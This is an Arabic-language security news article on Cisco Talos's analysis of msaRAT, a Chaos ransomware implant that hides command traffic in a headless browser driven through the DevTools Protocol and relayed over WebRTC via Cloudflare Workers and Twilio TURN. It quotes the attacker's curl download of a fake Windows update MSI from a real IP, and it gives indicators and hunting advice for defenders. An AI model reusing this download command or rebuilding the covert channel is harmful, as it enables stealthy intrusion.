قامت مجموعة Chaos Ransomware بتشغيل الأوامر والتحكم من خلال متصفح الضحية الخاص. قامت Cisco Talos يوم الخميس بتفصيل msaRAT، وهي غرسة Rust الموجودة خلفها، والتي تم العثور عليها على جهاز يعمل بنظام Windows مخترق قبل التشفير.

لا تفتح الغرسة أبدًا اتصالاً خارجيًا خاصًا بها. تتحدث عمليتها إلى 127.0.0.1 ولا شيء آخر. فهو يبدأ تشغيل Chrome أو Edge في وضع بدون رأس ويقود المتصفح عبر بروتوكول Chrome DevTools، وهو واجهة برمجة تطبيقات تصحيح الأخطاء الخاصة بالمتصفح.

تنتقل كل رسالة C2 من هناك عبر قناة بيانات WebRTC يتم ترحيلها بواسطة خدمة TURN الخاصة بـ Twilio، لذا فإن ما يراه المدافع على السلك هو متصفح يستدعي Cloudflare وTwilio. لا يظهر عنوان الخادم الخاص بالمهاجم مطلقًا.

كروم يتحدث

يبحث msaRAT عن Chrome أو Edge من خلال متغيرات البيئة أولاً، ثم يعود إلى سجل Chrome. إذا لم يتم العثور على متصفح مطابق، فسيتم تخطي مسار CDP.

عندما يجد واحدة، فإنه يبدأ المتصفح دون استخدام نافذة مرئية --headless=new، يمكّن CDP مع --remote-debugging-port، ويشير إليه بشكل منفصل --user-data-dir.

منذ إصدار Chrome 136، لم تعد Google تحترم مفتاح تصحيح الأخطاء مقابل الملف الشخصي الافتراضي، وهو تغيير تم الإعلان عنه في مارس 2025 بعد أن حمل سارقو المعلومات علامة سرقة ملفات تعريف الارتباط. يقدم msaRAT دليل ملف التعريف الخاص به، وبالتالي لا يعيق التغيير طريقه. لا شيء في تحليل تالوس يظهر أنه يمس ملف الضحية على الإطلاق.

البرمجيات الخبيثة تسأل /json/list/ لهدف قابل للتصحيح ويتصل بعنوان URL الخاص بـ WebSocket الذي تم إرجاعه. يقوم بإنشاء علامة تبويب، ويقوم بإيقاف تشغيل سياسة أمان المحتوى باستخدام Page.setBypassCSP، يسجل خمس عمليات رد اتصال من خلال Runtime.addBinding، والمكالمات Runtime.evaluate لحقن جافا سكريبت المخزن في نص عادي في الملفات الثنائية .rdata قسم.

أربعة أسماء رد الاتصال، msaOpen, msaClose, msaError، و msaMessage، أعطى Talos اسم البرنامج الضار. الخامس هو dataAck.

يقوم JavaScript بجلب تكوين STUN وTURN من Cloudflare Worker في is-01-ast[.]ols-img-12[.]workers[.]dev، مع إخفاء رؤوس Origin وReferer في صورة حركة مرور من موقع Microsoft. فهو يبني اتصالاً نظيرًا وينشر عرض SDP إلى نفس نقطة النهاية.

تعود الإجابة مع عدم وجود مرشحين لـ ICE وتم تعيين عنوان الاتصال على 0.0.0.0، لذلك لا يمكن إنشاء رابط مباشر من نظير إلى نظير، ويتم تشغيل القناة بأكملها عبر مرحل Twilio عند global.turn.twilio.com. بمجرد أن تصبح قناة البيانات نشطة، يخرج العامل من المسار.

يتم تشفير حركة المرور على تلك القناة مرتين. يتعامل المتصفح مع DTLS، ويوجد بداخله مخطط قائم على ChaCha-Poly1305 مرتبط بتبادل ECDH الذي يبدأ بـ 0xFE إطار المصافحة من C2 مباشرة بعد الاتصال.

تقوم الغرسة بتمرير إطارات الأوامر الواردة إلى cmd.exe /e:ON /v:OFF /d /c <cmd> للتنفيذ. يقرأ Talos قائمة انتظار الإرسال والتحكم في التدفق على أنها مصممة على الأرجح لنقل الحمولات الكبيرة مثل لقطات الشاشة أو الملفات بشكل موثوق.

لا يوجد نصف وسائل النقل جديد. أظهر Praetorian في أغسطس 2025 أن البنية التحتية TURN لمنصات المؤتمرات يمكن أن تحمل قناة C2 كاملة، ووجدت Sansec مقشدة في مارس 2026 تستخدم قنوات بيانات WebRTC لنقل بيانات البطاقة المسروقة بعد فحص HTTP.

يقوم msaRAT بوضع كليهما داخل غرسة Rust المرتبطة بالفوضى والتي تقوم بتشغيل متصفح مقطوع الرأس من خلال CDP.

الطريق إلى الداخل هو نفسه كما كان دائمًا

يصل msaRAT بعد أن يقوم المشغل بالتنفيذ بالفعل وقبل تشغيل برنامج التشفير. لم يذكر تالوس كيف تم الوصول إلى هذه الآلة. إن قواعد اللعبة الموثقة للمجموعة هي تدفق البريد العشوائي، والتصيد الاحتيالي، والمساعدة السريعة، وأدوات RMM للمثابرة.

تأتي عملية الزرع نفسها بأمر تجعيد واحد:

curl.exe http://172.86.126[.]18:443/update_ms.msi -o C:\programdata\update_ms.msi

المنفذ 443، HTTP عادي. قواعد جدار الحماية المكتوبة حول أرقام المنافذ دون فحص البروتوكول تسمح لها بالمرور. يحمل MSI بيانات خاصية تنتحل تحديث Windows، ويتم تشغيل إجراء مخصص في نهاية التثبيت لتحميل ملف DLL مضمن مباشرة في الذاكرة.

ملف DLL هذا هو msaRAT: مكتوب بلغة Rust في وقت تشغيل Tokio async، ويتم تصدير دالة مسماة RUN لكي يتصل المثبت.

ملاحظات الصيد

msaRAT عبارة عن برنامج ضار لمرحلة ما بعد الاختراق ولا يعتمد على ثغرة أمنية في Chrome أو Edge، لذا لا يتوفر لدى المدافعين أي تصحيح للمتصفح لتطبيق التقنية نفسها.

الإشارة التي تدوم هي سلوك العملية. وكما يقول تالوس، “يتم ملاحظة أن جميع الاتصالات الخارجية تنشأ من عملية متصفح شرعية.” تم إطلاق البحث عن Chrome أو Edge بواسطة أداة التثبيت أو الخدمة أو أحد الوالدين الآخرين غير التفاعليين --headless=new و --remote-debugging-port تعيين.

ثم اربط هذه العملية بحركة الاسترجاع إلى منفذ تصحيح الأخطاء وWebRTC الصادر. حيث يلتقط القياس عن بعد رسائل CDP، Runtime.addBinding و Runtime.evaluate هي المحاور. سيكون للأساطيل التي تقوم بتشغيل أتمتة المتصفح أو CI وظائفها الخاصة بدون رأس لضبطها.

اعتبارًا من 23 يوليو 2026، لم ينشر Talos أي تجزئات للملفات الخاصة بـ msaRAT. مجموعة المؤشرات العامة عبارة عن عنصرين من عناصر الشبكة، عنوان IP المرحلي واسم مضيف العامل، وكلاهما موجود في مستودع IOC الخاص به. تغطية الكشف عن تالوس:

  • كلاماف: Win.Downloader.ChaosRaas-10060321-0
  • الشخير 2: 1:66839, 1:66840, 1:66841
  • شخير 3: 1:66839, 1:301587

وهذه المؤشرات مفيدة ولكنها ضيقة. workers.dev هو مجال النشر المشترك لـ Cloudflare، والذي تم إصداره لكل حساب عامل، وقد استخدمه المهاجمون العام الماضي لتنظيم الحمولات والنفق C2.

تدير Twilio خدمة STUN وTURN شرعية تعتمد عليها تطبيقات WebRTC الحقيقية. قم بالحظر إما على مستوى المؤسسة وستؤدي إلى قطع حركة المرور لكل من يستخدمها. يقرأ تالوس أن هذا هو السبب المحتمل لاختيار Cloudflare Workers للإشارة.

تعامل مع هذا باعتباره حرفة تجارية ملحوظة وليس حملة محسوبة. لم يحدد التقرير هوية الضحية، أو يحدد عدد المؤسسات التي تلقت msaRAT، أو يذكر متى دخلت البرامج الضارة حيز الاستخدام، أو يشرح كيفية الحصول على بيانات اعتماد Cloudflare Worker وTwilio TURN.

التسليم عادي: تنزيل حليقة، تحديث Windows مزيف، ملف DLL تم تحميله من MSI. ما يتغير هو المكان الذي يعيش فيه C2 بعد ذلك، ويمكن تبديل كلا المؤشرين المنشورين في Talos غدًا. من الصعب نقل المتصفح بدون رأس الذي ينتجه المثبت، لأنه هو الأسلوب.

يتحقق msaRAT من متصفحين ويحتاج إلى وجود أحدهما والسماح له بالخروج. في أسطول Windows، لا يعد هذا مطلبًا صعبًا.

شاركها.
اترك تعليقاً